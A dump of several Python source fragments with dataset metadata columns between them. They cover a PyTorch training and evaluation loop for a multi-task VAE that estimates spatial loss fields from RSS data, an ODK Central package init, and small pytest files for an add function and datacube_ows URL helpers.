    Test_Dataset_2 = TensorDataset(test_input_RSS2, test_denoise_RSS2, test_slf_img2, test_ab2, test_noise_level2)
    return Test_Dataset_2
def train(self, model, train_loader, optimizer, epoch):
    """Run one training epoch of the multi-task MLMVAE.

    The objective is a weighted sum of four task losses (RSS reconstruction,
    SLF estimation, ab-parameter estimation, noise-level classification)
    plus the KL divergence, whose weight ramps up over batches (warm-up)
    and is capped at ``args.lambda0``.

    Args:
        model: MLMVAE whose forward pass returns (KLD, RSS, SLF, ab,
            noise_level, kl_loss_w, kl_loss_h, kl_loss_c).
        train_loader: DataLoader of (input_RSS, target_RSS, target_SLF,
            target_ab, target_noise_level) batches.
        optimizer: optimizer over ``model``'s parameters.
        epoch: 1-based epoch index; drives the KLD warm-up schedule.

    Returns:
        10-tuple of per-sample averages: (loss, kld, task0..task3 losses,
        accuracy, kld_w, kld_h, kld_c).
    """
    model.train()
    train_loss = 0  # total loss
    train_kld = 0  # total kl-divergence
    train_loss_task0 = 0  # loss for reconstruct RSS
    train_loss_task1 = 0  # loss for SLF image estimation
    train_loss_task2 = 0  # loss for parameters estimation
    train_loss_task3 = 0  # loss for noise level prediction
    train_acc = 0  # accuracy for noise level prediction
    train_kl_loss_w = 0  # kl-divergence for w
    train_kl_loss_h = 0  # kl-divergence for h
    train_kl_loss_c = 0  # kl-divergence for c
    # batches per epoch; batch_10num spreads the KLD warm-up over 10 epochs
    batch_num = int(len(train_loader.dataset) / self.args.batch_size) + 1
    batch_10num = batch_num * 10
    for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(train_loader):
        input_RSS = input_RSS.to(self.device)
        target_RSS = target_RSS.to(self.device)
        target_SLF = target_SLF.to(self.device)
        target_ab = target_ab.to(self.device)
        target_noise_level = target_noise_level.to(self.device)
        optimizer.zero_grad()
        KLD, RSS, SLF, ab, noise_level, kl_loss_w, kl_loss_h, kl_loss_c = model(input_RSS)
        # per-element-normalised task losses, summed over the batch
        loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum')/(self.args.N * self.args.P * self.args.P)
        loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum')/(self.args.K0 * self.args.K1)
        loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum')/(self.args.N + 1)
        loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
        # KLD weight: linear ramp within each 20-epoch cycle, capped at lambda0
        loss_weight0 = (((epoch-1) % 20) * batch_num + batch_idx) / batch_10num
        loss_weight0 = np.minimum(loss_weight0, self.args.lambda0)
        loss = loss_weight0 * KLD + self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1\
            + self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
        # accumulate un-normalised sums; divided by dataset size after the loop
        train_loss += loss.item()
        train_kld += KLD.item()
        train_kl_loss_w += kl_loss_w.item()
        train_kl_loss_h += kl_loss_h.item()
        train_kl_loss_c += kl_loss_c.item()
        train_loss_task0 += loss_task0.item()
        train_loss_task1 += loss_task1.item()
        train_loss_task2 += loss_task2.item()
        train_loss_task3 += loss_task3.item()
        # accuracy of the noise-level classification head
        _, noise_pred = torch.max(noise_level, 1)
        acc_task3 = (noise_pred == target_noise_level).sum()
        train_acc += acc_task3.item()
        # normalise by batch size before backprop so gradients are per-sample
        loss /= input_RSS.size(0)
        loss.backward()
        optimizer.step()
        if batch_idx % self.args.log_interval == 0:
            print(
                'Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}\tKLD: {:.6f}\tLoss0: {:.6f}\tLoss1: {:.6f}\tLoss2: {:.6f}\tLoss3: {:.6f}\tAcc: {:.6f}'.format(
                    epoch, batch_idx * len(input_RSS), len(train_loader.dataset),
                    100. * batch_idx / len(train_loader),
                    loss.item(),
                    KLD.item() / len(input_RSS),
                    loss_task0.item() / len(input_RSS), loss_task1.item() / len(input_RSS),
                    loss_task2.item() / len(input_RSS), loss_task3.item() / len(input_RSS), acc_task3.item() / len(input_RSS)))
            print(
                'Train Epoch: {} [{}/{} ({:.0f}%)]\tkld_w: {:.6f}\tkld_h: {:.6f}\tkld_c: {:.6f}'.format(
                    epoch, batch_idx * len(input_RSS), len(train_loader.dataset),
                    100. * batch_idx / len(train_loader),
                    kl_loss_w.item() / len(input_RSS),
                    kl_loss_h.item() / len(input_RSS),
                    kl_loss_c.item() / len(input_RSS)))
    # convert sums to per-sample averages
    train_loss /= len(train_loader.dataset)
    train_kld /= len(train_loader.dataset)
    train_kl_loss_w /= len(train_loader.dataset)
    train_kl_loss_h /= len(train_loader.dataset)
    train_kl_loss_c /= len(train_loader.dataset)
    train_loss_task0 /= len(train_loader.dataset)
    train_loss_task1 /= len(train_loader.dataset)
    train_loss_task2 /= len(train_loader.dataset)
    train_loss_task3 /= len(train_loader.dataset)
    train_acc /= len(train_loader.dataset)
    print('====> Epoch: {} Average loss: {:.6f}'.format(epoch, train_loss))
    print('====> KL divergence: {:.6f}'.format(train_kld))
    print('====> KLD_W: {:.6f}'.format(train_kl_loss_w))
    print('====> KLD_H: {:.6f}'.format(train_kl_loss_h))
    print('====> KLD_C: {:.6f}'.format(train_kl_loss_c))
    print('====> RSS loss: {:.6f}'.format(train_loss_task0))
    print('====> SLF loss: {:.6f}'.format(train_loss_task1))
    print('====> ab loss: {:.6f}'.format(train_loss_task2))
    print('====> noise level loss: {:.6f}'.format(train_loss_task3))
    print('====> noise level Accuracy: {:.4f}'.format(train_acc))
    return train_loss, train_kld, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3, train_acc, train_kl_loss_w, train_kl_loss_h, train_kl_loss_c
def validate(self, model, val_loader, epoch):
    """Run one validation pass over ``val_loader``.

    Args:
        model: MLMVAE under training.
        val_loader: DataLoader of (input_RSS, target_RSS, target_SLF,
            target_ab, target_noise_level) batches.
        epoch: unused; kept for interface symmetry with train()/test().

    Returns:
        (val_loss, val_rmse_slf, val_mae_slf) averaged per sample.
    """
    model.eval()
    val_loss = 0  # weighted multi-task loss (KLD deliberately excluded)
    val_rmse_slf = 0  # accumulates per-pixel SLF squared error
    val_mae_slf = 0  # accumulates per-pixel SLF absolute error
    # Inference only: no_grad skips autograd graph construction.
    with torch.no_grad():
        for input_RSS, target_RSS, target_SLF, target_ab, target_noise_level in val_loader:
            input_RSS = input_RSS.to(self.device)
            target_RSS = target_RSS.to(self.device)
            target_SLF = target_SLF.to(self.device)
            target_ab = target_ab.to(self.device)
            target_noise_level = target_noise_level.to(self.device)
            KLD, RSS, SLF, ab, noise_level, *_ = model(input_RSS)
            loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum') / (
                self.args.N * self.args.P * self.args.P)
            loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
            loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum') / (self.args.N + 1)
            loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
            # KLD is excluded from the validation criterion (its training
            # weight is an epoch-dependent warm-up, so including it would
            # make epochs incomparable); the original '0 * KLD' term and the
            # unused warm-up weight computation were dead code and removed.
            loss = self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1 \
                + self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
            val_loss += loss.item()
            val_rmse_slf += (F.mse_loss(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)).item()
            val_mae_slf += (F.l1_loss(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)).item()
    # per-sample averages; RMSE takes the sqrt of the mean squared error
    val_loss /= len(val_loader.dataset)
    val_rmse_slf = np.sqrt(val_rmse_slf / len(val_loader.dataset))
    val_mae_slf /= len(val_loader.dataset)
    print('====> Validation set loss: {:.6f}'.format(val_loss))
    print('====> Validation set SLF rmse: {:.6f}'.format(val_rmse_slf))
    print('====> Validation set SLF mae: {:.6f}'.format(val_mae_slf))
    return val_loss, val_rmse_slf, val_mae_slf
def test(self, model, test_loader, epoch):
    """Evaluate the multi-task losses on ``test_loader`` for one epoch.

    Mirrors train() -- including the epoch-dependent KLD warm-up weight --
    so train and test curves stay comparable, but runs under no_grad and
    additionally reports classification accuracy via test_accuracy().

    Args:
        model: MLMVAE whose forward pass returns (KLD, RSS, SLF, ab,
            noise_level, kl_loss_w, kl_loss_h, kl_loss_c).
        test_loader: DataLoader of (input_RSS, target_RSS, target_SLF,
            target_ab, target_noise_level) batches.
        epoch: 1-based epoch index; drives the KLD warm-up weight.

    Returns:
        10-tuple of per-sample averages: (loss, kld, task0..task3 losses,
        accuracy, kld_w, kld_h, kld_c).
    """
    model.eval()
    test_loss = 0  # total loss
    test_kld = 0  # KL-divergence
    test_loss_task0 = 0  # loss for reconstruct RSS
    test_loss_task1 = 0  # loss for SLF image estimation
    test_loss_task2 = 0  # loss for parameters estimation
    test_loss_task3 = 0  # loss for noise level prediction
    test_kl_loss_w = 0  # kl-divergence for w
    test_kl_loss_h = 0  # kl-divergence for h
    test_kl_loss_c = 0  # kl-divergence for c
    # batch counts for the KLD warm-up schedule (matches train())
    batch_num = int(len(test_loader.dataset) / self.args.batch_size) + 1
    batch_10num = batch_num * 10
    with torch.no_grad():
        for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(test_loader):
            input_RSS = input_RSS.to(self.device)
            target_RSS = target_RSS.to(self.device)
            target_SLF = target_SLF.to(self.device)
            target_ab = target_ab.to(self.device)
            target_noise_level = target_noise_level.to(self.device)
            KLD, RSS, SLF, ab, noise_level, kl_loss_w, kl_loss_h, kl_loss_c = model(input_RSS)
            # per-element-normalised task losses, summed over the batch
            loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum') / (
                self.args.N * self.args.P * self.args.P)
            loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
            loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum') / (self.args.N + 1)
            loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
            # same warm-up weighting as training so losses are comparable
            loss_weight0 = (((epoch - 1) % 20) * batch_num + batch_idx) / batch_10num
            loss_weight0 = np.minimum(loss_weight0, self.args.lambda0)
            loss = loss_weight0 * KLD + self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1 \
                + self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
            test_loss += loss.item()
            test_kld += KLD.item()
            test_kl_loss_w += kl_loss_w.item()
            test_kl_loss_h += kl_loss_h.item()
            test_kl_loss_c += kl_loss_c.item()
            test_loss_task0 += loss_task0.item()
            test_loss_task1 += loss_task1.item()
            test_loss_task2 += loss_task2.item()
            test_loss_task3 += loss_task3.item()
    # convert sums to per-sample averages
    test_loss /= len(test_loader.dataset)
    test_kld /= len(test_loader.dataset)
    test_kl_loss_w /= len(test_loader.dataset)
    test_kl_loss_h /= len(test_loader.dataset)
    test_kl_loss_c /= len(test_loader.dataset)
    test_loss_task0 /= len(test_loader.dataset)
    test_loss_task1 /= len(test_loader.dataset)
    test_loss_task2 /= len(test_loader.dataset)
    test_loss_task3 /= len(test_loader.dataset)
    test_acc = self.test_accuracy(model, test_loader)
    print('====> Test set loss: {:.6f}'.format(test_loss))
    print('====> Test set KL divergence: {:.6f}'.format(test_kld))
    print('====> Test set KLD_W: {:.6f}'.format(test_kl_loss_w))
    print('====> Test set KLD_H: {:.6f}'.format(test_kl_loss_h))
    print('====> Test set KLD_C: {:.6f}'.format(test_kl_loss_c))
    print('====> Test set RSS loss: {:.6f}'.format(test_loss_task0))
    print('====> Test set SLF loss: {:.6f}'.format(test_loss_task1))
    print('====> Test set ab loss: {:.6f}'.format(test_loss_task2))
    print('====> Test set noise level loss: {:.6f}'.format(test_loss_task3))
    print('====> Test set noise level Accuracy: {:.4f}'.format(test_acc))
    return test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc, test_kl_loss_w, test_kl_loss_h, test_kl_loss_c
def train_save(self):
    """Full training driver for MLMVAE.

    Per epoch: trains, validates (stepping the LR scheduler on validation
    loss), and evaluates on the test set plus the two held-out images.
    Saves a checkpoint every ``args.save_freq`` epochs, keeps the best
    model (lowest validation SLF MAE) at ``model_<n_epochs>.pth``, and
    finally writes all metric histories to .npy/.npz files.
    """
    model = MLMVAE(M=self.args.M, P=self.args.P, K=(self.args.K0, self.args.K1))

    def weights_init(m):
        # Xavier-uniform weights and zero biases for linear/conv/deconv layers
        if isinstance(m, torch.nn.Linear) or isinstance(m, torch.nn.Conv2d) or isinstance(m,
                torch.nn.ConvTranspose2d):
            torch.nn.init.xavier_uniform_(m.weight.data)
            if m.bias is not None:
                torch.nn.init.zeros_(m.bias.data)

    model.apply(weights_init)
    model = model.to(self.device)
    summary(model, input_size=(self.args.batch_size, self.args.N, self.args.P, self.args.P))
    train_loader, val_loader, test_loader, test_loader1, test_loader2 = self.load_data()
    optimizer = self.get_optimizer(model.parameters())
    # quarter the LR when validation loss plateaus for 10 epochs
    scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min', factor=0.25, patience=10, min_lr=1e-5)
    train_set = []
    val_set = []
    test_set = []  # for test set
    test_set1 = []  # for test image 1
    test_set2 = []  # for test image 2
    train_loss_path = self.path + 'train_loss_' + str(self.args.n_epochs) + '.npy'
    val_loss_path = self.path + 'val_loss_' + str(self.args.n_epochs) + '.npy'
    test_loss_path = self.path + 'test_loss_' + str(self.args.n_epochs) + '.npz'
    model_path = self.path + 'model_' + str(self.args.n_epochs) + '.pth'
    current_val_slf_loss = np.inf  # best (lowest) validation SLF MAE so far
    for epoch in range(1, self.args.n_epochs + 1):
        print("Epoch %d learning rate:%f" % (epoch, optimizer.param_groups[0]['lr']))
        train_loss, train_kld, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3, train_acc, train_kl_loss_w, train_kl_loss_h, train_kl_loss_c = self.train(
            model,
            train_loader,
            optimizer,
            epoch)
        train_set.append(
            [train_loss, train_kld, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3,
             train_acc, train_kl_loss_w, train_kl_loss_h, train_kl_loss_c])
        print('====> Validation Loss for Epoch {:d}'.format(epoch))
        val_loss, val_slf_rmse, val_slf_mae = self.validate(model, val_loader, epoch)
        val_set.append([val_loss, val_slf_rmse, val_slf_mae])
        scheduler.step(val_loss)
        print('====> Test for Epoch {:d}'.format(epoch))
        test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc, test_kl_loss_w, test_kl_loss_h, test_kl_loss_c = self.test(
            model,
            test_loader, epoch)
        test_set.append(
            [test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc,
             test_kl_loss_w, test_kl_loss_h, test_kl_loss_c])
        print('====> Test Image1 for Epoch {:d}'.format(epoch))
        test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc, test_kl_loss_w, test_kl_loss_h, test_kl_loss_c = self.test(
            model,
            test_loader1, epoch)
        test_set1.append(
            [test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc,
             test_kl_loss_w, test_kl_loss_h, test_kl_loss_c])
        print('====> Test Image2 for Epoch {:d}'.format(epoch))
        test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc, test_kl_loss_w, test_kl_loss_h, test_kl_loss_c = self.test(
            model,
            test_loader2, epoch)
        test_set2.append(
            [test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc,
             test_kl_loss_w, test_kl_loss_h, test_kl_loss_c])
        # periodic epoch-numbered checkpoint
        if epoch % self.args.save_freq == 0:
            ckpt_path = self.path + '/model' + '_' + str(epoch) + '.pth'
            torch.save(model.state_dict(), ckpt_path)
            print('checkpoint{}.pth saved!'.format(epoch))
        # keep the best model by validation SLF MAE at model_path
        if val_slf_mae < current_val_slf_loss:
            torch.save(model.state_dict(), model_path)
            current_val_slf_loss = val_slf_mae
    # persist metric histories for later analysis/plotting
    train_loss = np.asarray(train_set).reshape(-1, 10)
    val_loss = np.asarray(val_set).reshape(-1, 3)
    test_loss = np.asarray(test_set).reshape(-1, 10)
    test_loss1 = np.asarray(test_set1).reshape(-1, 10)
    test_loss2 = np.asarray(test_set2).reshape(-1, 10)
    np.save(train_loss_path, train_loss)
    np.save(val_loss_path, val_loss)
    np.savez(test_loss_path, test_loss=test_loss, test_loss1=test_loss1, test_loss2=test_loss2)
def test_accuracy(self, model, test_loader):
    """Compute noise-level classification accuracy over ``test_loader``.

    Args:
        model: trained VAE whose forward pass returns
            ``(KLD, RSS, SLF, ab, noise_pred, ...)`` where ``noise_pred``
            has shape [batch_size, 3] (per-class scores).
        test_loader: DataLoader whose batches start with the RSS input and
            end with the integer noise-class label.

    Returns:
        float: fraction of samples whose argmax prediction matches the label.
    """
    model.eval()
    correct = 0
    # Inference only: no_grad avoids building the autograd graph and the
    # associated memory growth over the whole test set.
    with torch.no_grad():
        for input_RSS, *_, target_noise_level in test_loader:
            input_RSS = input_RSS.to(self.device)
            KLD, RSS, SLF, ab, noise_pred, *_ = model(input_RSS)  # noise_pred: [batch_size, 3]
            pred = np.argmax(noise_pred.cpu().numpy(), axis=1)
            labels = target_noise_level.cpu().numpy()
            correct += np.sum((pred == labels).astype(int))
    return correct / len(test_loader.dataset)
def test_model(self, noise_level='all'):
model = MLMVAE(M=self.args.M, P=self.args.P, K=(self.args.K0, self.args.K1))
model = model.to(self.device)
model_path = self.path + 'model_' + str(self.args.n_epochs) + '.pth'
model.load_state_dict(torch.load(model_path, map_location=self.device))
model.eval()
*_, test_loader, test_loader1, test_loader2 = self.load_data(noise_level)
noise_class = 0 # noise_class = 0 stands for all noise classes
if noise_level == 'low':
noise_class = 1
elif noise_level == 'mid':
noise_class = 2
elif noise_level == 'high':
noise_class = 3
# test model for testing set
slf_rmse = 0
slf_mae = 0
ab_rmse = 0
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(
test_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_pred, *_ = model(input_RSS)
# plot SLF reconstruction image for image1
n = min(target_RSS.size(0), 8)
comparison = torch.cat([target_SLF.view(target_RSS.size(0), 1, self.args.K0, self.args.K1)[:n],
SLF.view(SLF.size(0), 1, self.args.K0, self.args.K1)[:n]])
save_image(comparison.cpu(),
self.path + 'reconstruction_SLF_noise' + str(noise_class) + '_' + str(batch_idx) + '.png',
nrow=n)
# test SLF image RMSE
slf_rmse += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test SLF image MAE
slf_mae += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test ab parameters RMSE
ab_rmse += F.mse_loss(ab, target_ab, reduction='sum').item() / (self.args.N + 1)
slf_rmse /= len(test_loader.dataset)
slf_rmse = np.sqrt(slf_rmse)
slf_mae /= len(test_loader.dataset)
ab_rmse /= len(test_loader.dataset)
ab_rmse = np.sqrt(ab_rmse)
noise_acc = self.test_accuracy(model, test_loader)
print('====> Test for Testing Set:')
print('====> Noise_level: ' + noise_level)
print('====> Test set SLF rmse: {:.6f}'.format(slf_rmse))
print('====> Test set SLF mae: {:.6f}'.format(slf_mae))
print('====> Test set ab rmse: {:.6f}'.format(ab_rmse))
print('====> Test set noise level Accuracy: {:.4f}'.format(noise_acc))
# test model for image 1
slf_rmse = 0
slf_mae = 0
ab_rmse = 0
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(test_loader1):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_pred, *_ = model(input_RSS)
# plot SLF reconstruction image for image1
n = min(target_RSS.size(0), 8)
comparison = torch.cat([target_SLF.view(target_RSS.size(0), 1, self.args.K0, self.args.K1)[:n],
SLF.view(SLF.size(0), 1, self.args.K0, self.args.K1)[:n]])
save_image(comparison.cpu(),
self.path + 'reconstruction_SLF1_noise' + str(noise_class) + '_' + str(batch_idx) + '.png',
nrow=n)
# test SLF image RMSE
slf_rmse += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test SLF image MAE
slf_mae += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test ab parameters RMSE
ab_rmse += F.mse_loss(ab, target_ab, reduction='sum').item() / (self.args.N + 1)
slf_rmse /= len(test_loader1.dataset)
slf_rmse = np.sqrt(slf_rmse)
slf_mae /= len(test_loader1.dataset)
ab_rmse /= len(test_loader1.dataset)
ab_rmse = np.sqrt(ab_rmse)
noise_acc = self.test_accuracy(model, test_loader1)
print('====> Test for image 1:')
print('====> Noise_level: ' + noise_level)
print('====> Test set SLF rmse: {:.6f}'.format(slf_rmse))
print('====> Test set SLF mae: {:.6f}'.format(slf_mae))
print('====> Test set ab rmse: {:.6f}'.format(ab_rmse))
print('====> Test set noise level Accuracy: {:.4f}'.format(noise_acc))
# test model for image 2
slf_rmse = 0
slf_mae = 0
ab_rmse = 0
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(test_loader2):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_pred, *_ = model(input_RSS)
# plot SLF reconstruction image for image1
n = min(target_RSS.size(0), 8)
comparison = torch.cat([target_SLF.view(target_RSS.size(0), 1, self.args.K0, self.args.K1)[:n],
SLF.view(SLF.size(0), 1, self.args.K0, self.args.K1)[:n]])
save_image(comparison.cpu(),
self.path + 'reconstruction_SLF2_noise' + str(noise_class) + '_' + str(batch_idx) + '.png',
nrow=n)
# test SLF image RMSE
slf_rmse += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test SLF image MAE
slf_mae += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test ab parameters RMSE
ab_rmse += F.mse_loss(ab, target_ab, reduction='sum').item() / (self.args.N + 1)
slf_rmse /= len(test_loader2.dataset)
slf_rmse = np.sqrt(slf_rmse)
slf_mae /= len(test_loader2.dataset)
ab_rmse /= len(test_loader2.dataset)
ab_rmse = np.sqrt(ab_rmse)
noise_acc = self.test_accuracy(model, test_loader2)
print('====> Test for image 2:')
print('====> Noise_level: ' + noise_level)
print('====> Test set SLF rmse: {:.6f}'.format(slf_rmse))
print('====> Test set SLF mae: {:.6f}'.format(slf_mae))
print('====> Test set ab rmse: {:.6f}'.format(ab_rmse))
print('====> Test set noise level Accuracy: {:.4f}'.format(noise_acc))
| 57.830873
| 182
| 0.610163
| 25,377
| 188,066
| 4.205068
| 0.013201
| 0.053977
| 0.019567
| 0.021085
| 0.988239
| 0.986618
| 0.985981
| 0.985981
| 0.985091
| 0.98406
| 0
| 0.028501
| 0.27166
| 188,066
| 3,252
| 183
| 57.830873
| 0.750555
| 0.090091
| 0
| 0.969407
| 0
| 0.00258
| 0.065922
| 0.005733
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026907
| false
| 0.005898
| 0.00516
| 0
| 0.056395
| 0.081828
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8cec1dec9b6607aa204bf23f40ef40a649c6e18c
| 458
|
py
|
Python
|
centralpy/responses/__init__.py
|
pmaengineering/centralpy
|
edd89925bcc4204add1bf93b7ff3437cc0e6ea92
|
[
"MIT"
] | null | null | null |
centralpy/responses/__init__.py
|
pmaengineering/centralpy
|
edd89925bcc4204add1bf93b7ff3437cc0e6ea92
|
[
"MIT"
] | 1
|
2022-01-22T14:36:57.000Z
|
2022-01-24T07:19:44.000Z
|
centralpy/responses/__init__.py
|
pmaengineering/centralpy
|
edd89925bcc4204add1bf93b7ff3437cc0e6ea92
|
[
"MIT"
] | 1
|
2021-06-30T13:45:09.000Z
|
2021-06-30T13:45:09.000Z
|
"""Module for possible ODK Central responses."""
from centralpy.responses.attachment import Attachment
from centralpy.responses.attachment_listing import AttachmentListing
from centralpy.responses.csv_zip import CsvZip
from centralpy.responses.form_listing import FormListing
from centralpy.responses.project_listing import ProjectListing
from centralpy.responses.response import Response
from centralpy.responses.submission_listing import SubmissionListing
| 50.888889
| 68
| 0.879913
| 53
| 458
| 7.509434
| 0.415094
| 0.228643
| 0.386935
| 0.160804
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074236
| 458
| 8
| 69
| 57.25
| 0.938679
| 0.091703
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
50aa022d209d97457ea14fb1b3d0a19aeae938e3
| 151
|
py
|
Python
|
tests/test_custom_utils.py
|
tahseenadit/azure-pipeline-pyscaffold-unittest
|
2f78ef1d53a5e0aae45e1901dc333833a33ef5d2
|
[
"MIT"
] | null | null | null |
tests/test_custom_utils.py
|
tahseenadit/azure-pipeline-pyscaffold-unittest
|
2f78ef1d53a5e0aae45e1901dc333833a33ef5d2
|
[
"MIT"
] | null | null | null |
tests/test_custom_utils.py
|
tahseenadit/azure-pipeline-pyscaffold-unittest
|
2f78ef1d53a5e0aae45e1901dc333833a33ef5d2
|
[
"MIT"
] | null | null | null |
import pytest
from demoproject.custom_utils import add
def test_add():
    """add() should sum two numbers, for both int and float operands."""
    cases = [
        ((2, 5), 7),
        ((2.5, 2.5), 5),
        ((6, 6), 12),
    ]
    for (a, b), expected in cases:
        assert add(a, b) == expected
| 21.571429
| 40
| 0.649007
| 28
| 151
| 3.428571
| 0.535714
| 0.28125
| 0.208333
| 0.229167
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10084
| 0.211921
| 151
| 7
| 41
| 21.571429
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.166667
| true
| 0
| 0.333333
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
50aeb890a9857838963354f75af1cac3cb99ff39
| 1,834
|
py
|
Python
|
tests/test_ogc_utils.py
|
GispoCoding/datacube-ows
|
4ffe14ccf9f382bff8f4a33fc54729d3e18b670e
|
[
"Apache-2.0"
] | 2
|
2020-08-10T13:41:42.000Z
|
2020-09-23T22:20:00.000Z
|
tests/test_ogc_utils.py
|
GispoCoding/datacube-ows
|
4ffe14ccf9f382bff8f4a33fc54729d3e18b670e
|
[
"Apache-2.0"
] | null | null | null |
tests/test_ogc_utils.py
|
GispoCoding/datacube-ows
|
4ffe14ccf9f382bff8f4a33fc54729d3e18b670e
|
[
"Apache-2.0"
] | 2
|
2020-07-31T16:54:23.000Z
|
2020-08-10T13:42:41.000Z
|
import datacube_ows.ogc_utils
import pytest
def test_get_service_base_url():
    """get_service_base_url returns the request URL when it is allowed,
    otherwise falls back to the first allowed URL; trailing '/' is stripped."""
    cases = [
        # (allowed_urls, request_url, expected) — not a list
        ("https://foo.hello.world",
         "https://foo.bar.baz",
         "https://foo.hello.world"),
        # Value not in list
        (["https://foo.hello.world", "https://alice.bob.eve"],
         "https://foo.bar.baz",
         "https://foo.hello.world"),
        # Value in list
        (["https://foo.hello.world", "https://foo.bar.baz", "https://alice.bob.eve"],
         "https://foo.bar.baz",
         "https://foo.bar.baz"),
        # Trailing /
        (["https://foo.bar.baz", "https://alice.bob.eve"],
         "https://foo.bar.baz/",
         "https://foo.bar.baz"),
        # Include path
        (["https://foo.bar.baz", "https://foo.bar.baz/wms/"],
         "https://foo.bar.baz/wms/",
         "https://foo.bar.baz/wms"),
        # Use value from list instead of request (scheme mismatch)
        (["https://foo.bar.baz", "https://foo.bar.baz/wms/"],
         "http://foo.bar.baz/wms/",
         "https://foo.bar.baz/wms"),
    ]
    for allowed_urls, request_url, expected in cases:
        assert datacube_ows.ogc_utils.get_service_base_url(allowed_urls, request_url) == expected
def test_parse_for_base_url():
    """parse_for_base_url drops the scheme, query string and trailing slash."""
    result = datacube_ows.ogc_utils.parse_for_base_url(
        "https://hello.world.bar:8000/wms/?CheckSomething"
    )
    assert result == "hello.world.bar:8000/wms"
| 39.021277
| 93
| 0.690294
| 280
| 1,834
| 4.275
| 0.157143
| 0.133668
| 0.120301
| 0.175439
| 0.868003
| 0.786132
| 0.781955
| 0.745196
